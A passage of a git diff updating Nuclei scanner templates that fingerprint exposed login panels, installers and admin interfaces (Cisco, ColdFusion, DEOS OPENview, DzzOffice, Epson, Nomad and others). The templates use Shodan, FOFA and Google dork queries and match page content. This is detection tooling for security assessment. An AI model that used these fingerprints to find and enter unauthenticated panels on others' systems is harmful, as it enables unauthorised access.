+  metadata:
+    shodan-query: http.title:"Cisco ServiceGrid"
   tags: panel,cisco
 
 requests:
diff --git a/exposed-panels/cisco/cisco-telepresence.yaml b/exposed-panels/cisco/cisco-telepresence.yaml
index 93a3d7423f..8acf6500c9 100644
--- a/exposed-panels/cisco/cisco-telepresence.yaml
+++ b/exposed-panels/cisco/cisco-telepresence.yaml
@@ -5,6 +5,7 @@ info:
   author: dhiyaneshDk
   severity: info
   metadata:
+    verified: true
     shodan-query: http.title:"Cisco Telepresence"
   tags: panel,cisco
 
@@ -13,12 +14,14 @@ requests:
     path:
       - "{{BaseURL}}/login.html"
 
+    redirects: true
+    max-redirects: 2
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "<title>Cisco TelePresence MCU - login:</title>"
+          - "Cisco TelePresence MCU - login:"
 
       - type: status
         status:
diff --git a/exposed-panels/cisco/cisco-vmanage-login.yaml b/exposed-panels/cisco/cisco-vmanage-login.yaml
new file mode 100644
index 0000000000..e2fd84b0eb
--- /dev/null
+++ b/exposed-panels/cisco/cisco-vmanage-login.yaml
@@ -0,0 +1,27 @@
+id: cisco-vmanage-login
+
+info:
+  name: Cisco vManage Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Cisco vManage"
+  tags: panel,cisco
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>Cisco vManage</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/claris-filemaker-webdirect.yaml b/exposed-panels/claris-filemaker-webdirect.yaml
new file mode 100644
index 0000000000..e79a51fed8
--- /dev/null
+++ b/exposed-panels/claris-filemaker-webdirect.yaml
@@ -0,0 +1,32 @@
+id: claris-filemaker-webdirect
+
+info:
+  name: Claris FileMaker WebDirect
+  author: DhiyaneshDK
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/5669
+  metadata:
+    verified: true
+    shodan-dork: title:"Claris FileMaker WebDirect"
+  tags: panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/fmi/webd/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Claris FileMaker WebDirect</title>'
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/clearpass-policy-manager.yaml b/exposed-panels/clearpass-policy-manager.yaml
index 2f51f4abe4..f0f26c0b46 100644
--- a/exposed-panels/clearpass-policy-manager.yaml
+++ b/exposed-panels/clearpass-policy-manager.yaml
@@ -4,8 +4,8 @@ info:
   name: ClearPass Policy Manager - Aruba Networks
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
+  metadata:
+    shodan-query: http.title:"ClearPass Policy Manager"
   tags: panel,aruba
 
 requests:
diff --git a/exposed-panels/cloudphysician-radar.yaml b/exposed-panels/cloudphysician-radar.yaml
index 10cb2fb9a0..14fbe91dc8 100644
--- a/exposed-panels/cloudphysician-radar.yaml
+++ b/exposed-panels/cloudphysician-radar.yaml
@@ -8,7 +8,7 @@ info:
     - https://www.exploit-db.com/ghdb/7466
   metadata:
     shodan-query: http.title:"Cloudphysician RADAR"
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/codemeter-webadmin-panel.yaml b/exposed-panels/codemeter-webadmin-panel.yaml
index bcb121e897..3b8b0e48a5 100644
--- a/exposed-panels/codemeter-webadmin-panel.yaml
+++ b/exposed-panels/codemeter-webadmin-panel.yaml
@@ -1,10 +1,13 @@
 id: codemeter-webadmin-panel
 
 info:
-  name: CodeMeter WebAdmin Panel
+  name: CodeMeter - WebAdmin Panel Access
   author: Techryptic (@Tech)
-  severity: high
-  description: Panel on CodeMeter WebAdmin application.
+  severity: info
+  description: CodeMeter WebAdmin panel was accessed.
+  classification:
+    cvss-score: 0.0
+    cwe-id: CWE-668
   tags: codemeter,webadmin,panel
 
 requests:
@@ -23,3 +26,5 @@ requests:
         status:
           - 301
           - 302
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposed-panels/coldfusion-administrator-login.yaml b/exposed-panels/coldfusion-administrator-login.yaml
index 51d8b79fed..6a6f93f69e 100644
--- a/exposed-panels/coldfusion-administrator-login.yaml
+++ b/exposed-panels/coldfusion-administrator-login.yaml
@@ -4,10 +4,8 @@ info:
   name: ColdFusion Administrator Login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22
   metadata:
-    shodan-query: http.component:"Adobe ColdFusion"
+    shodan-query: http.title:"ColdFusion Administrator Login"
   tags: panel,coldfusion,adobe
 
 requests:
@@ -19,7 +17,7 @@ requests:
     matchers:
       - type: word
         words:
-          - '<title>ColdFusion Administrator Login</title>'
+          - 'ColdFusion Administrator Login'
 
       - type: status
         status:
diff --git a/exposed-panels/concrete5/concrete5-install.yaml b/exposed-panels/concrete5/concrete5-install.yaml
index f683f2ad12..18ee36fc1c 100644
--- a/exposed-panels/concrete5/concrete5-install.yaml
+++ b/exposed-panels/concrete5/concrete5-install.yaml
@@ -8,8 +8,9 @@ info:
   reference:
     - https://documentation.concretecms.org/developers/introduction/installing-concrete-cms
   metadata:
+    verified: true
     shodan-query: http.title:"Install concrete5"
-  tags: panel,concrete,cms
+  tags: panel,install,concrete,cms
 
 requests:
   - method: GET
@@ -17,17 +18,18 @@ requests:
       - "{{BaseURL}}/index.php/install"
       - "{{BaseURL}}/concrete5/index.php/install"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body
         words:
           - '<title>Install concrete5</title>'
 
+      - type: status
+        status:
+          - 200
+
     extractors:
       - type: regex
         part: body
diff --git a/exposed-panels/contao-login-panel.yaml b/exposed-panels/contao-login-panel.yaml
new file mode 100644
index 0000000000..e1112d80a4
--- /dev/null
+++ b/exposed-panels/contao-login-panel.yaml
@@ -0,0 +1,29 @@
+id: contao-login-panel
+
+info:
+  name: Contao Login Panel
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Contao Open Source CMS"
+  tags: panel,contao
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/contao/login"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "Contao Open Source CMS"
+          - "<h1>Login</h1>"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/corebos-panel.yaml b/exposed-panels/corebos-panel.yaml
new file mode 100644
index 0000000000..c7b9be436d
--- /dev/null
+++ b/exposed-panels/corebos-panel.yaml
@@ -0,0 +1,26 @@
+id: corebos-panel
+
+info:
+  name: CoreBos - Panel
+  author: arafatansari
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"corebos"
+  tags: panel,corebos
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Powered by coreBOS'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/cortex-xsoar-login.yaml b/exposed-panels/cortex-xsoar-login.yaml
index 62fb8daad7..5151fc8bfa 100644
--- a/exposed-panels/cortex-xsoar-login.yaml
+++ b/exposed-panels/cortex-xsoar-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Cortex XSOAR Login Panel
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Cortex+XSOAR%22
+  metadata:
+    shodan-query: http.title:"Cortex XSOAR"
   tags: panel,soar,login
 
 requests:
diff --git a/exposed-panels/cpanel-api-codes.yaml b/exposed-panels/cpanel-api-codes.yaml
new file mode 100644
index 0000000000..eba217cec2
--- /dev/null
+++ b/exposed-panels/cpanel-api-codes.yaml
@@ -0,0 +1,31 @@
+id: cpanel-api-codes
+
+info:
+  name: CPanel API Codes
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"CPanel - API Codes"
+  tags: panel,cpanel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<title>CPanel - API Codes</title>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/crush-ftp-login.yaml b/exposed-panels/crush-ftp-login.yaml
index e2bca4e138..4d7242ed8c 100644
--- a/exposed-panels/crush-ftp-login.yaml
+++ b/exposed-panels/crush-ftp-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6591
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/cvent-panel-detect.yaml b/exposed-panels/cvent-panel-detect.yaml
new file mode 100644
index 0000000000..260a07ac06
--- /dev/null
+++ b/exposed-panels/cvent-panel-detect.yaml
@@ -0,0 +1,30 @@
+id: cvent-panel-detect
+
+info:
+  name: Cvent Panel Detect
+  author: tess
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Cvent Inc"
+  tags: panel,cvent
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/Login.aspx'
+      - '{{BaseURL}}/manager/login.aspx'
+      - '{{BaseURL}}/GDSHost/Default.aspx'
+      - '{{BaseURL}}/events/EventRsvp.aspx'
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Cvent Inc"
+          - "Cvent, Inc."
+        condition: or
diff --git a/exposed-panels/d-link-wireless.yaml b/exposed-panels/d-link-wireless.yaml
index 7ae336b0d4..b98de3ff91 100644
--- a/exposed-panels/d-link-wireless.yaml
+++ b/exposed-panels/d-link-wireless.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6784
-  tags: panel,dlink,router
+  tags: dlink,router,edb,panel
 
 requests:
   - method: GET
diff --git a/exposed-panels/dell-openmanager-login.yaml b/exposed-panels/dell-openmanager-login.yaml
index 0f686806d6..37aadf6d84 100644
--- a/exposed-panels/dell-openmanager-login.yaml
+++ b/exposed-panels/dell-openmanager-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Dell OpenManage Switch Administrator
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22
+  metadata:
+    shodan-query: html:"Dell OpenManage Switch Administrator"
   tags: panel,dell
 
 requests:
diff --git a/exposed-panels/deos-open500-admin.yaml b/exposed-panels/deos-open500-admin.yaml
new file mode 100644
index 0000000000..5812fcd906
--- /dev/null
+++ b/exposed-panels/deos-open500-admin.yaml
@@ -0,0 +1,37 @@
+id: deos-open500ems-panel
+
+info:
+  name: DEOS OPEN 500EMS Controller Admin Program Access
+  author: sullo
+  severity: high
+  description: |
+    The DEOS OPEN 500EMS controller exposes administrative functions without authentication.
+  reference:
+    - https://www.deos-ag.com/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-284
+  tags: openv500,disclosure,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/cosmobdf.cgi?function=0"
+      - "{{BaseURL}}/cgi-bin/cosmobdf.cgi?function=1"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '<b>OPENview</b>'
+          - '/cgi-bin/cosmobdf.cgi?function=12'
+          - '/cgi-bin/cosmobdf.cgi?function=2'
+        condition: or
+
+# Enhanced by cs on 2022/07/22
diff --git a/exposed-panels/deos-openview-admin.yaml b/exposed-panels/deos-openview-admin.yaml
new file mode 100644
index 0000000000..182396fc83
--- /dev/null
+++ b/exposed-panels/deos-openview-admin.yaml
@@ -0,0 +1,31 @@
+id: deos-openview-panel
+
+info:
+  name: DEOS OPENview Admin Panel Unauthenticated Access
+  author: sullo
+  severity: high
+  description: The DEOS OPENview administrative panel is accessible without authentication.
+  reference: https://www.deos-ag.com/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-284
+  tags: openview,disclosure,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/client/index.html"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '<title>OPENview</title>'
+
+# Enhanced by cs on 2022/07/22
diff --git a/exposed-panels/dericam-login.yaml b/exposed-panels/dericam-login.yaml
index 5170789158..42e8a962e0 100644
--- a/exposed-panels/dericam-login.yaml
+++ b/exposed-panels/dericam-login.yaml
@@ -8,7 +8,7 @@ info:
     - https://www.exploit-db.com/ghdb/7354
   metadata:
     shodan-query: http.title:"Dericam"
-  tags: panel,dericam
+  tags: panel,dericam,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/docebo-elearning-panel.yaml b/exposed-panels/docebo-elearning-panel.yaml
new file mode 100644
index 0000000000..1e0c7a6814
--- /dev/null
+++ b/exposed-panels/docebo-elearning-panel.yaml
@@ -0,0 +1,26 @@
+id: docebo-elearning-panel
+
+info:
+  name: Docebo E-learning Login Panel
+  author: pikpikcu
+  severity: info
+  metadata:
+    verified: true
+    fofa-query: title="Docebo E-learning"
+  tags: panel,docebo
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Docebo E-learning"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/drawio-flowchartmaker-panel.yaml b/exposed-panels/drawio-flowchartmaker-panel.yaml
new file mode 100644
index 0000000000..ca869a7189
--- /dev/null
+++ b/exposed-panels/drawio-flowchartmaker-panel.yaml
@@ -0,0 +1,29 @@
+id: drawio-flowchartmaker-panel
+
+info:
+  name: Draw.io Flowchart Maker Panel
+  author: princechaddha
+  severity: info
+  reference:
+    - https://github.com/jgraph/drawio
+  metadata:
+    verified: true
+    shodan-query: http.title:"Flowchart Maker"
+  tags: panel,drawio,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>Flowchart Maker &amp; Online Diagram Software</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/drupal-login.yaml b/exposed-panels/drupal-login.yaml
index d36180c3a9..a55e1520c9 100644
--- a/exposed-panels/drupal-login.yaml
+++ b/exposed-panels/drupal-login.yaml
@@ -4,6 +4,8 @@ info:
   name: Drupal login
   author: pathtaga
   severity: info
+  metadata:
+    shodan-query: http.component:"drupal"
   tags: panel,drupal
 
 requests:
diff --git a/exposed-panels/dzzoffice/dzzoffice-install.yaml b/exposed-panels/dzzoffice/dzzoffice-install.yaml
new file mode 100644
index 0000000000..056429d268
--- /dev/null
+++ b/exposed-panels/dzzoffice/dzzoffice-install.yaml
@@ -0,0 +1,34 @@
+id: dzzoffice-install
+
+info:
+  name: DzzOffice Exposed Installation
+  author: ritikchaddha
+  severity: high
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-1961736892
+    fofa-query: title="dzzoffice"
+  tags: dzzoffice,install
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/install/index.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'DzzOffice'
+
+      - type: word
+        part: body
+        words:
+          - '简体中文 UTF8 版'
+          - 'Simplified Chinese UTF8 version'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/dzzoffice/dzzoffice-panel.yaml b/exposed-panels/dzzoffice/dzzoffice-panel.yaml
new file mode 100644
index 0000000000..8260da90b2
--- /dev/null
+++ b/exposed-panels/dzzoffice/dzzoffice-panel.yaml
@@ -0,0 +1,34 @@
+id: dzzoffice-panel
+
+info:
+  name: DzzOffice Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-1961736892
+  tags: dzzoffice,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/index.php"
+      - "{{BaseURL}}/user.php?mod=login"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'content="DzzOffice'
+          - 'DZZSCRIPT'
+          - "dzzoffice.com"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/e-mobile-panel.yaml b/exposed-panels/e-mobile-panel.yaml
new file mode 100644
index 0000000000..ad9ab67ae1
--- /dev/null
+++ b/exposed-panels/e-mobile-panel.yaml
@@ -0,0 +1,38 @@
+id: e-mobile-panel
+
+info:
+  name: E-mobile Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"E-Mobile&nbsp"
+  tags: panel,e-mobile
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.do?"
+      - "{{BaseURL}}/login/login.do?"
+      - "{{BaseURL}}/manager/login.do?"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "E-Mobile&nbsp;"
+          - "Weaver E-Mobile"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'E-Mobile&nbsp;([0-9.]+)'
diff --git a/exposed-panels/eMerge-panel.yaml b/exposed-panels/eMerge-panel.yaml
new file mode 100644
index 0000000000..1303b78121
--- /dev/null
+++ b/exposed-panels/eMerge-panel.yaml
@@ -0,0 +1,28 @@
+id: eMerge-panel
+
+info:
+  name: Nortek Linear eMerge - Panel Detect
+  author: arafatansari
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"eMerge"
+  tags: panel,emerge,nortek
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '<title>(.*)Linear eMerge(.*)</title>'
+          - '/emerge.ico'
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/emby-panel.yaml b/exposed-panels/emby-panel.yaml
new file mode 100644
index 0000000000..6327da58bb
--- /dev/null
+++ b/exposed-panels/emby-panel.yaml
@@ -0,0 +1,40 @@
+id: emby-panel
+
+info:
+  name: Emby Login Panel
+  author: idealphase
+  severity: info
+  description: |
+    Emby Server is a personal media server with apps on just about every device.
+  reference:
+    - https://github.com/MediaBrowser/Emby
+    - https://emby.media/
+  metadata:
+    verified: true
+    shodan-query: http.title:"emby"
+  tags: panel,emby,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Emby</title>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<script src="apploader\.js\?v=(.+)" defer><\/script>'
diff --git a/exposed-panels/ems-webclient-panel.yaml b/exposed-panels/ems-webclient-panel.yaml
index c4caaa5ec3..9216dae7df 100644
--- a/exposed-panels/ems-webclient-panel.yaml
+++ b/exposed-panels/ems-webclient-panel.yaml
@@ -5,7 +5,7 @@ info:
   author: pussycat0x,daffainfo
   severity: info
   metadata:
-    google-dork: inurl:EMSWebClient/
+    google-query: inurl:EMSWebClient/
   tags: panel,ems
 
 requests:
diff --git a/exposed-panels/epson-access-detect.yaml b/exposed-panels/epson-access-detect.yaml
index a6a93882fd..b7192cffca 100644
--- a/exposed-panels/epson-access-detect.yaml
+++ b/exposed-panels/epson-access-detect.yaml
@@ -3,16 +3,14 @@ id: epson-access-detect
 info:
   name: Epson Device Unauthorized Access Detect
   author: pussycat0x
-  severity: medium
+  severity: info
   description: A publicly available Epson device panel (printer, scanner, etc.) was detected.
   reference:
     - https://www.exploit-db.com/ghdb/6922
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
-    cvss-score: 5.8
-    cwe-id: CWE-522
-  tags: iot,printer,panel,unauth,epson
-
+    cvss-score: 0.0
+    cwe-id: CWE-668
+  tags: iot,printer,panel,unauth,epson,edb
 requests:
   - method: GET
     path:
diff --git a/exposed-panels/epson-projector-detect.yaml b/exposed-panels/epson-projector-detect.yaml
index badaf4ea07..49c215cc30 100644
--- a/exposed-panels/epson-projector-detect.yaml
+++ b/exposed-panels/epson-projector-detect.yaml
@@ -1,27 +1,27 @@
-id: epson-projector-detect
+id: epson-projector-detect
 
-info:
-  name: Epson Projector
-  author: gy741
-  severity: info
-  metadata:
-    fofa-query: "cgi-bin/webconf.exe"
-  tags: iot,projector,panel,unauth,epson
+info:
+  name: Epson Projector
+  author: gy741
+  severity: info
+  metadata:
+    fofa-query: "cgi-bin/webconf.exe"
+  tags: iot,projector,panel,unauth,epson
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "cgi-bin/webconf.exe?page=1"
-          - "<title>Web Control</title>"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "cgi-bin/webconf.exe?page=1"
+          - "<title>Web Control</title>"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/epson-web-control-detect.yaml b/exposed-panels/epson-web-control-detect.yaml
index bcd2634d8d..1626e61563 100644
--- a/exposed-panels/epson-web-control-detect.yaml
+++ b/exposed-panels/epson-web-control-detect.yaml
@@ -9,7 +9,7 @@ info:
     - https://www.exploit-db.com/ghdb/6873
   classification:
     cwe-id: CWE-200
-  tags: iot,printer,panel,unauth,epson
+  tags: panel,unauth,epson,edb,iot,printer
 
 requests:
   - method: GET
diff --git a/exposed-panels/eventum-panel.yaml b/exposed-panels/eventum-panel.yaml
new file mode 100644
index 0000000000..cc3b49bb5a
--- /dev/null
+++ b/exposed-panels/eventum-panel.yaml
@@ -0,0 +1,34 @@
+id: eventum-panel
+
+info:
+  name: Eventum Panel Detect
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:305412257
+  tags: panel,eventum
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: or
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - '<title>Login - Eventum</title>'
+          - 'title="Eventum Issues search"'
+        condition: or
+
+      - type: word
+        part: body
+        words:
+          - 'Database Error:'
+          - 'There seems to be a problem connecting to the database server specified in your configuration file'
+        condition: and
diff --git a/exposed-panels/exposed-nomad.yaml b/exposed-panels/exposed-nomad.yaml
index 31e23d2e9e..596c2e082d 100644
--- a/exposed-panels/exposed-nomad.yaml
+++ b/exposed-panels/exposed-nomad.yaml
@@ -1,11 +1,16 @@
 id: exposed-nomad
 
 info:
-  name: Exposed Nomad Jobs
+  name: Nomad - Exposed Jobs
   author: pdteam
-  severity: high
+  severity: medium
+  description: Nomad jobs were discovered.
   reference:
     - https://www.nomadproject.io/docs/internals/security
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cwe-id: CWE-200
   tags: nomad,devops,hashicorp,panel
 
 requests:
@@ -28,4 +33,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposed-panels/exposed-webalizer.yaml b/exposed-panels/exposed-webalizer.yaml
index d273b5ecc0..c7131f5625 100644
--- a/exposed-panels/exposed-webalizer.yaml
+++ b/exposed-panels/exposed-webalizer.yaml
@@ -1,18 +1,37 @@
 id: exposed-webalizer
 
 info:
-  name: Publicly exposed Webalizer Interface
+  name: Publicly Exposed Webalizer Interface
   author: pdteam
   severity: low
-  tags: panel,webalizer
+  reference:
+    - https://www.exploit-db.com/ghdb/197
+  metadata:
+    verified: true
+    google-query: intext:"webalizer"  intext:"Usage Statistics for"
+  tags: panel,webalizer,edb
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}/webalizer/'
+
+    matchers-condition: and
     matchers:
       - type: word
         words:
           - "Webalizer Version"
           - "Usage statistics for"
         condition: and
+        case-insensitive: true
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'Webalizer Version ([0-9.-]+)'
diff --git a/exposed-panels/extreme-netconfig-ui.yaml b/exposed-panels/extreme-netconfig-ui.yaml
index 680c3666c5..9ff70643b1 100644
--- a/exposed-panels/extreme-netconfig-ui.yaml
+++ b/exposed-panels/extreme-netconfig-ui.yaml
@@ -1,33 +1,33 @@
-id: extreme-netconfig-ui
+id: extreme-netconfig-ui
 
-info:
-  name: Extreme NetConfig UI
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: 'http.title:"Extreme NetConfig UI"'
-  tags: panel,tech,hiveos,extreme
+info:
+  name: Extreme NetConfig UI
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'http.title:"Extreme NetConfig UI"'
+  tags: panel,tech,hiveos,extreme
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/index.php5"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>Extreme NetConfig UI</title>'
-        condition: and
-
-      - type: status
-        status:
-          - 200
-
-    extractors:
-      - type: regex
-        part: body
-        group: 1
-        regex:
-          - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php5"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Extreme NetConfig UI</title>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'
diff --git a/exposed-panels/ez-publish-panel.yaml b/exposed-panels/ez-publish-panel.yaml
new file mode 100644
index 0000000000..f66d692da1
--- /dev/null
+++ b/exposed-panels/ez-publish-panel.yaml
@@ -0,0 +1,30 @@
+id: ez-publish-panel
+
+info:
+  name: eZ Publish Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"eZ Publish"
+  tags: panel,ez
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'content="eZ Publish'
+        case-insensitive: true
+
+      - type: word
+        part: header
+        words:
+          - 'eZ Publish'
diff --git a/exposed-panels/f-secure-policy-manager.yaml b/exposed-panels/f-secure-policy-manager.yaml
index 73e4615766..2e91d70585 100644
--- a/exposed-panels/f-secure-policy-manager.yaml
+++ b/exposed-panels/f-secure-policy-manager.yaml
@@ -4,8 +4,8 @@ info:
   name: F-Secure Policy Manager Server
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22
+  metadata:
+    shodan-query: http.title:"F-Secure Policy Manager Server"
   tags: login,panel
 
 requests:
diff --git a/exposed-panels/faraday-login.yaml b/exposed-panels/faraday-login.yaml
index 14e0f98189..ac011e5840 100644
--- a/exposed-panels/faraday-login.yaml
+++ b/exposed-panels/faraday-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Faraday Login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=html%3A%22faradayApp%22
+  metadata:
+    shodan-query: html:"faradayApp"
   tags: panel,faraday
 
 requests:
diff --git a/exposed-panels/fiori-launchpad.yaml b/exposed-panels/fiori-launchpad.yaml
new file mode 100644
index 0000000000..3e4fa43976
--- /dev/null
+++ b/exposed-panels/fiori-launchpad.yaml
@@ -0,0 +1,35 @@
+id: fiori-launchpad
+
+info:
+  name: Fiori Launchpad Login
+  author: DhiyaneshDk
+  severity: info
+  reference:
+    - https://www.exploit-db.com/ghdb/7941
+  metadata:
+    verified: true
+    google-query: sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html -site:sap.com
+  tags: sap,fiori,edb,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Logon</title>"
+          - "SAP SE"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/fiorilaunchpad-logon.yaml b/exposed-panels/fiorilaunchpad-logon.yaml
index b382b5bfbe..6d2687324c 100644
--- a/exposed-panels/fiorilaunchpad-logon.yaml
+++ b/exposed-panels/fiorilaunchpad-logon.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6793
-  tags: panel
+  tags: panel,edb
